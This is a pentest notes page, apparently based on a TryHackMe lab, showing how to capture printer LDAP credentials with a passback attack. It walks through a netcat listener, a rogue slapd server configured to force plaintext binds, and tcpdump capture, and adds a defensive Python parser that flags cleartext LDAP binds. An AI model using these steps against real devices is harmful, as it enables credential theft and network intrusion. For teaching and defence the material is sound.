# Passback Attacks

## LDAP

* Imagine we have a printer in the network. In the TryHackMe example we have access to the printer's settings page, which exposes the LDAP login configuration, so we can change the server IP and put ours instead\
  ![login page](/files/BSL4qhNn3FvwYzvZI5rx)
* `nc -lvp 389`
* We get a connection back when sending the form. The console shows `supportedCapabilitiesresponse`
* As mentioned in the room:\
  "The `supportedCapabilitiesresponse` tells us we have a problem. Essentially, before the printer sends over the credentials, it is trying to negotiate the LDAP authentication method details. It will use this negotiation to select the most secure authentication method that both the printer and the LDAP server support. If the authentication method is too secure, the credentials will not be transmitted in cleartext. With some authentication methods, the credentials will not be transmitted over the network at all! So we can't just use normal Netcat to harvest the credentials. We will need to create a rogue LDAP server and configure it insecurely to ensure the credentials are sent in plaintext."
* `sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd`
* `sudo dpkg-reconfigure -p low slapd` to configure the LDAP server
* We then have to make a file `olcSaslSecProps.ldif`

```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

* `sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart`
* `sudo tcpdump -SX -i eth0 tcp port 389` (we need to replace eth0 with the appropriate interface)
* And we should get the password, just like in the example from TryHackMe:\
  ![password](/files/mY2EWaZencdGSAuwtjYb)
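To make the negotiation point above concrete from the defender's side, here is an added example (not code from the original page or the TryHackMe room) that decodes an LDAP BindRequest and flags whether the credentials travel in the clear, which is the condition a rogue server is trying to force. The packets, the bind DN and the password are constructed here; a real check would feed it the TCP payloads from a port 389 capture.

```python
def _tlv(buf, pos):
    """Read one BER TLV at pos -> (tag, value, next_pos); handles short and long-form lengths."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                                   # long form: next n bytes hold the length
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def classify_bind(pkt):
    """Describe an LDAPMessage carrying a BindRequest; returns None for any other message."""
    tag, msg, _ = _tlv(pkt, 0)
    if tag != 0x30:                                 # LDAPMessage is a SEQUENCE
        return None
    _, mid, pos = _tlv(msg, 0)                      # messageID INTEGER
    tag, op, _ = _tlv(msg, pos)
    if tag != 0x60:                                 # BindRequest is [APPLICATION 0]
        return None
    _, version, pos = _tlv(op, 0)
    _, name, pos = _tlv(op, pos)                    # bind DN (LDAPDN)
    auth_tag, auth, _ = _tlv(op, pos)               # AuthenticationChoice
    info = {"message_id": int.from_bytes(mid, "big"), "version": version[0],
            "bind_dn": name.decode(), "secret_len": 0}
    if auth_tag == 0x80:                            # simple [0]: the password is on the wire in the clear
        info.update(method="simple", cleartext=True, secret_len=len(auth))
    elif auth_tag == 0xA3:                          # sasl [3]: SEQUENCE { mechanism, credentials OPTIONAL }
        _, mech, pos = _tlv(auth, 0)
        mech = mech.decode()
        if pos < len(auth):
            info["secret_len"] = len(_tlv(auth, pos)[1])
        # PLAIN and LOGIN pass the password through; other mechanisms do not expose it directly
        info.update(method="sasl:" + mech, cleartext=mech in ("PLAIN", "LOGIN"))
    else:
        info.update(method="unknown", cleartext=False)
    return info

def _enc(tag, value):
    """BER short-form encoder, enough for the small constructed samples below."""
    return bytes([tag, len(value)]) + value

# Constructed sample 1 (made-up DN and password): a simple bind, i.e. what a device
# sends when the server it talks to advertises no mechanism that protects the secret.
SIMPLE_BIND = _enc(0x30, _enc(0x02, b"\x01") + _enc(0x60,
    _enc(0x02, b"\x03") + _enc(0x04, b"cn=printer,dc=corp,dc=local") + _enc(0x80, b"Passw0rd!")))
# Constructed sample 2: an initial SASL DIGEST-MD5 bind, no credentials on the wire yet.
SASL_BIND = _enc(0x30, _enc(0x02, b"\x02") + _enc(0x60,
    _enc(0x02, b"\x03") + _enc(0x04, b"") + _enc(0xA3, _enc(0x04, b"DIGEST-MD5"))))

if __name__ == "__main__":
    for pkt in (SIMPLE_BIND, SASL_BIND):
        print(classify_bind(pkt))
```

A device whose binds classify as `cleartext=True` toward any server is one that would hand its credentials to a rogue LDAP host like the one configured above; the fix on the device side is LDAPS or a SASL mechanism that does not pass the password through.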

## Resources

{% embed url="https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/" %}
A Pen Tester's Guide to Printer Hacking
{% endembed %}

{% embed url="https://tryhackme.com/room/breachingad" %}
Breaching AD - TryHackMe
{% endembed %}
